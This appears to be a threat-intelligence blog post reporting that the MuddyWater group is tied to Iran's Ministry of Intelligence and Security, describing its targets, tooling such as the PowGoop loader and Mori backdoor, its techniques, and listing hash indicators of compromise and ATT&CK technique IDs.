November 30, 2023

USCYBERCOM has officially linked to Iran’s Ministry of Intelligence and Security (MOIS). The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that targeted entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.


MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iran Intelligence Community. These actors, known as MuddyWater in industry, are part of groups conducting Iranian intelligence activities, and have been seen using a variety of techniques to maintain access to victim networks. MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).

The samples that uploaded include multiple variants of PowGoop loader, JavaScripts deployed using the PowGoop and a Mori backdoor sample.


MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.

The researchers discovered an interesting subset of activity targeting Exchange servers of high-profile organizations. The subset of Exchange exploitation activity is interesting because it is difficult to attribute it to MuddyWater due to the use of publicly available offensive security tools. The attackers attempt to exploit Exchange servers using two different tools.

Indicators of Compromise

PowGoop variants (MD5, SHA1, SHA256)


8FED2FF6B739C13BADB14C1A884D738C80CB6F34 AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94

F8E7FF6895A18CC3D05D024AC7D8BE3E 97248B6E445D38D48334A30A916E7D9DDA33A9B2 F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3


81F46998C92427032378E5DEAD48BDFC9128B225 DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92


570F7272412FF8257ED6868D90727A459E3B179E B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504





T1190 – Exploit Public-Facing ApplicationT1572 – Protocol TunnelingT1574.001 – Hijack Execution Flow: DLL Search Order HijackingT1059.001 – Command and Scripting Interpreter: PowerShellT1505.003 – Server Software Component: Web ShellT1220 – XSL Script Processing

2 thoughts on “MuddyWater Officially Tied to Iran MOIS 🇮🇷

Leave a Reply

%d bloggers like this: